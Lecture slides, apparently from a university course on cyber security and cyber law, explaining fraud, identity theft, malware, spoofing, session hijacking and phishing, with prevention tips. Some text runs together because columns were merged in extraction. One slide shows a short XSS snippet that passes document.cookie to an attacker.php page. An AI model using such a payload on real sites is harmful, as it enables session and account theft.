• Phishing: Sending deceptive emails or messages that
appear to be from a trusted source, tricking users into
revealing sensitive details like login credentials or credit Online
Credit card
card numbers. banking
details
accounts
• Malware: Installing malicious software on a victim's
device to steal information or disrupt system functionality.
• Social engineering: Manipulating people into divulging
confidential information through psychological tactics. Personal
Social identificati
• Spoofing: Creating fake websites or emails that closely media on
resemble legitimate ones to deceive users. accounts informatio
• Data breaches: Gaining unauthorized access to a n (PII)
database containing sensitive personal data.
https://www.thehindu.com/data/
cyber-fraud-in-banking-
CSIT371 Cyber Security and Cyber Laws - Module 2 transactions-surges-in-fy24-data/ 55
 Amity Institute of Information Technology
Mapping the global geography of
cybercrime with the World
Cybercrime Index

CSIT371 Cyber Security and Cyber Laws - Module 2 https://journals.plos.org/plosone/article?id=10.1371/ 56

 Amity Institute of Information Technology

Online Frauds: How to protect

yourself
• Strong passwords: Use complex, unique
passwords for each online account
• Two-factor authentication (2FA): Enable
extra security layers to verify your identity
during login
• Be cautious with links and attachments:
Don't click on suspicious links or open
attachments from unknown senders
• Regular software updates: Keep your
operating systems and applications updated
with the latest security patches
• Antivirus software: Install reliable antivirus
protection on your devices
• Be aware of scams: Be vigilant about offers
that seem too good to be true
• Report suspicious activity: Contact your
bank or relevant authorities if you suspect
fraudulent activity
CSIT371 Cyber Security and Cyber Laws - Module 2 57
 Amity Institute of Information Technology

Identity Theft and Intellectual

Property Theft
• "Identity theft" refers to when
someone illegally uses
another person's personal
information, like their Social
Security number or credit
card details, to gain financial
benefits or commit fraud,
• While "intellectual property
theft" involves stealing
someone's creative work or
inventions, like patents,
trademarks, or copyrighted
material, without permission.

CSIT371 Cyber Security and Cyber Laws - Module 2 58

 Amity Institute of Information Technology

Common Identity Theft

CSIT371 Cyber Security and Cyber Laws - Module 2 59

 Amity Institute of Information Technology

Identity Theft Case

CSIT371 Cyber Security and Cyber Laws - Module 2 60


Intellectual Property Theft
• Common Causes and Culprits of
Intellectual Property Theft
• The range of people and parties
participating in IP theft is becoming
increasingly sophisticated. Some of
the most common culprits
associated with IP theft include:
• Foreign Adversaries
• Insiders
• Competitors
• Hackers
• Threat Actors
• some competitive advantage. This could be a
Rogue Employees
CSIT371 Cyber Security and Cyber Laws - Module 2
Amity Institute of Information Technology
• Types of intellectual property
• Copyrighted materials: Books, art, and
software can be protected by copyright by
individuals or organizations. Copyrights protect
their use by others without explicit permission.
• Patented material: Inventors secure patents to
protect their innovations, typically preventing
others from profiting from their unique ideas for
20 years.
• Trademarks: Organizations can get trademark
protections for words, phrases, symbols, designs,
or any combination thereof that identify and
distinguish their brands of products and services.
• Trade secrets: This broad category refers to
confidential information that gives organizations
production system, a strategy, or even a client
list.
61
 Amity Institute of Information Technology
How to Prevent Identity Theft and
intellectual property theft?, and Mitigate
Damages
• Maintain limited access controls – Ensure that only authorized personnel can access confidential
information. Use proper cybersecurity protocols, such as multifactor authentication and encryption, to
safeguard sensitive data.
• Perform IP protection audits – Conduct regular audits to identify gaps or vulnerabilities in your IP
protection strategy and ensure they’re addressed to avoid exploitation.
• Register your intellectual property – Apply to have your intellectual property filed and registered
with the relevant authorities and establish legal ownership to prevent others from mimicking your
ideas without permission.
• Secure your networks and devices – Leverage technologies like firewalls, anti-virus software, and
other professional cybersecurity measures to protect your network and devices from data breaches
and cyber-attacks.
• Utilize non-disclosure agreements – Whenever possible, use non-disclosure agreements (NDAs)
as a layer of protection when sharing sensitive and confidential information with employees and
outside parties.
• Monitor your competitors – Keep an eye on your competitors and watch for any suspicious activity
or infringement on your intellectual property, such as knockoff product replicas.
• Conduct regular employee training – Train your employees on the importance of protecting
intellectual property and how to identify common cyber threats, particularly around IP theft.
• Enforce your rights – Exercise legal action against any parties infringing on your IP rights, thereby
CSIT371 Cyberpreventing
Security and Cyber Laws - damage
further Module 2 and deterring other threats from doing the same. 62
 Amity Institute of Information Technology

Network Theft
• Worms
• Virus
• Spam’s
• Ad-ware
• Spy ware
• Trojans

CSIT371 Cyber Security and Cyber Laws - Module 2 63

 Amity Institute of Information Technology

Backdoors and Bots

"Backdoor" is a hidden method that allows unauthorized access to a computer system,
bypassing normal security measures, while a "bot" is an automated program that can be
used for malicious activities like sending spam or launching attacks when controlled by a
hacker, often as part of a larger network called a botnet; essentially, a backdoor provides
the entry point for an attacker to gain control of a system, while bots act as the
automated tools used to carry out actions once that access is established.
• Key points about backdoors: • Key points about bots:
• Function: A backdoor is a secret way to • Automation: Bots are software
access a system without needing the programs that can perform repetitive
standard login credentials, allowing tasks automatically, mimicking human
attackers to steal data, install malware, or interaction.
manipulate system functions.
• Malicious Use: When controlled by a
• Creation: Backdoors can be intentionally hacker, bots can be used to send large
created by developers for legitimate reasons
volumes of spam emails, launch denial-
like system maintenance, but are often
maliciously implanted by hackers through of-service attacks, or harvest data from
exploits or during software development. websites.
• Detection Challenges: Backdoors can be • Botnets: A group of compromised
difficult to detect as they are designed to be computers controlled by a single entity,
covert, often using complex mechanisms to forming a "botnet," can be used to
activate and communicate with the attacker. execute coordinated attacks with
significant power.
CSIT371 Cyber Security and Cyber Laws - Module 2 64
 Amity Institute of Information Technology

Spoofing
Spoofing is a cybercrime where a malicious actor impersonates a trusted
entity to gain access to sensitive information. The goal is to exploit trust
and manipulate victims into taking actions that compromise their security.
• IP Spoofing: IP Spoofing is pretending to be someone else. This is a
technique used to gain unauthorized access to the computer with an IP
address of a trusted host. In implementing this technique, attacker has
to obtain the IP address of the client and inject his own packets spoofed
with the IP address of client into the TCP session, so as to fool the server
that it is communicating with the victim i.e. the original host.
• Address Resolution Protocol (ARP) spoofing: An attacker links their MAC
to a legitimate network IP address so they can receive data meant for
the owner of that IP address.

CSIT371 Cyber Security and Cyber Laws - Module 2 65

 Amity Institute of Information Technology

Session Hijacking
• Session hijacking is a cyberattack where an attacker
gains access to a user's online session. This allows the
attacker to impersonate the user and access their data
and actions.
• How it works
• The server assigns a session ID to a user when they log in.
• The attacker steals the session ID, which is usually stored in
cookies, URLs, or hidden form fields.
• The attacker uses the session ID to impersonate the user and
access their data.

CSIT371 Cyber Security and Cyber Laws - Module 2 66


Session Hijacking
• Methods used
• Packet sniffing: Intercepting
network traffic to capture session
IDs
• Cross-site scripting (XSS): Injecting
malicious scripts into web pages to
steal session IDs
• Malware: Using malware to infect a
user's device and extract session
information
• Brute force: Trying session IDs until
they are successful
• Calculation: Calculating session
IDs if they are generated in a non-
random manner
CSIT371 Cyber Security and Cyber Laws - Module 2
Amity Institute of Information Technology
• Consequences
• Identity theft, Financial theft,
Malware infection, Denial-of-
Service (DoS) attacks, and
Violations of data protection
regulations.
• How to prevent it ?
• Use HTTPS and HSTS, Implement
strong session management,
Enable HTTP-only and secure
flags on cookies, Implement
multifactor authentication (MFA),
and Educate users about the risks
of public Wi-Fi.
67
 Amity Institute of Information Technology

Session Hijacking
• TCP session hijacking is a security attack on a user session over a
protected network. The most common method of session
hijacking is called IP spoofing, when an attacker uses source-
routed IP packets to insert commands into an active
communication between two nodes on a network and disguise
itself as one of the authenticated users. This type of attack is
possible because authentication typically is only done at the start
of a TCP session.
• Another type of session hijacking is known as a man-in-the-
middle attack, where the attacker, using a sniffer, can observe
the communication between devices and collect the data that is
transmitted.
CSIT371 Cyber Security and Cyber Laws - Module 2 68
 Amity Institute of Information Technology

Session Hijacking
• Different ways of
session hijacking :
• Using Packet Sniffers: In
the given figure, it can be
seen that attack captures Session 1
the victim’s session ID to
gain access to the server
by using some packet
sniffers.

Session 2
CSIT371 Cyber Security and Cyber Laws - Module 2 69
 Amity Institute of Information Technology

Session Hijacking
• Cross Site Scripting(XSS
Attack)
Attacker can also capture
<SCRIPT type="text/javascript">
var adr = '../attacker.php?victim_cookie=' +
escape(document.cookie);
</SCRIPT>

victim’s Session ID using XSS

attack by using javascript. If
an attacker sends a crafted
link to the victim with the
malicious JavaScript, when the
victim clicks on the link, the
JavaScript will run and
complete the instructions
made by the attacker.

CSIT371 Cyber Security and Cyber Laws - Module 2 70

 Amity Institute of Information Technology

Sabotage
• Cyber sabotage is the intentional disruption of an organization's
computer systems or data to hinder its operations. It can also
involve damaging an organization's physical infrastructure.
• Examples of cyber sabotage
• Deleting code: Intentionally removing code to prevent an organization from operating
normally
• Infecing a website: Using malware to damage a website's information
• Interfering with computer systems: Altering, erasing, or suppressing computer data or
programs
• Ransomware attacks: Using ransomware to disrupt an organization's operations
• Who commits cyber sabotage?
• Saboteurs: People who intentionally damage an organization's systems or data
• Insiders: Employees who sabotage an organization's systems or data
CSIT371 Cyber Security and Cyber Laws - Module 2 71
 Amity Institute of Information Technology

Phishing History of Phishing

• Phishing is a type of deception designed  Phreaking + Fishing = Phishing
- Phreaking = making phone calls for free back in
to steal your valuable personal data, 70’s
such as credit card numbers, passwords, • - Fishing = Use bait to lure the target
account data, or other information.  Phishing in 1995
• Types of phishing Target: AOL users
Purpose: getting account passwords for free time
• Email phishing: A general term for any Threat level: low
malicious email message that tricks users Techniques: Similar names ( www.ao1.com for
into divulging private information. www.aol.com ), social
• Spear phishing: A targeted phishing attack engineering
that uses personalized messaging to trick a  Phishing in 2001
specific individual or organization. Target: Ebayers and major banks
• Smishing: A form of phishing that uses fake Purpose: getting credit card numbers, accounts
mobile text messages to trick people into Threat level: medium
downloading malware. Techniques: Same in 1995, keylogger
• Clone phishing: A phishing technique that
 Phishing in 2007
copies the look, feel, and content of a Target: Paypal, banks, ebay
legitimate message to gain the recipient's Purpose: bank accounts
Threat level: high
confidence.
Techniques: browser vulnerabilities, link obfuscation

CSIT371 Cyber Security and Cyber Laws - Module 2 72

 Amity Institute of Information Technology

Phishing
• How phishing works • How to protect yourself from
• Attackers masquerade as a phishing
reputable entity or person • Be skeptical of emails that
threaten negative consequences
• Attackers use personalized • Be wary of unusual requests
messaging, especially
emails, to trick victims
• Attackers often use threats
or a sense of urgency
• Attackers often use unusual
requests

CSIT371 Cyber Security and Cyber Laws - Module 2 73

 Amity Institute of Information Technology

Zombie/Zombie Drone
• "zombie" or "zombie drone" refers to a compromised computer that has been infected with
malware, allowing a hacker to remotely control it and use it to perform malicious actions without
the owner's knowledge, essentially turning it into a mindless "drone" carrying out the hacker's
commands, often as part of a larger botnet.

• Key points about zombie computers:

• Functionality: Once infected, a zombie computer can be used for various malicious activities like
sending spam emails, launching Distributed Denial-of-Service (DDoS) attacks, spreading further malware,
and more, all under the control of the attacker.
• Botnet connection: A group of zombie computers working together under a single attacker is called a
botnet, where the hacker can command the entire network of compromised devices simultaneously.
• How they become zombies: Computers can become zombies through various methods like phishing
emails, unpatched vulnerabilities, weak passwords, or drive-by downloads that install malicious software.
• The "zombie" analogy: The term "zombie" is used because, like a reanimated corpse in horror movies,
the infected computer is essentially under the control of another entity and has no will of its own.

CSIT371 Cyber Security and Cyber Laws - Module 2 74

 Amity Institute of Information Technology

How to protect against zombie

attacks?
• Keep software updated: Regularly install security patches and
updates for your operating system and applications to address
known vulnerabilities.
• Strong passwords: Use strong, unique passwords for each
online account.
• Antivirus software: Install reputable antivirus software and
keep it updated to detect and block malware.
• Firewall protection: Enable your firewall to monitor and control
incoming and outgoing network traffic.
• Be cautious with emails: Be wary of suspicious emails,
especially those with links or attachments from unknown senders.

CSIT371 Cyber Security and Cyber Laws - Module 2 75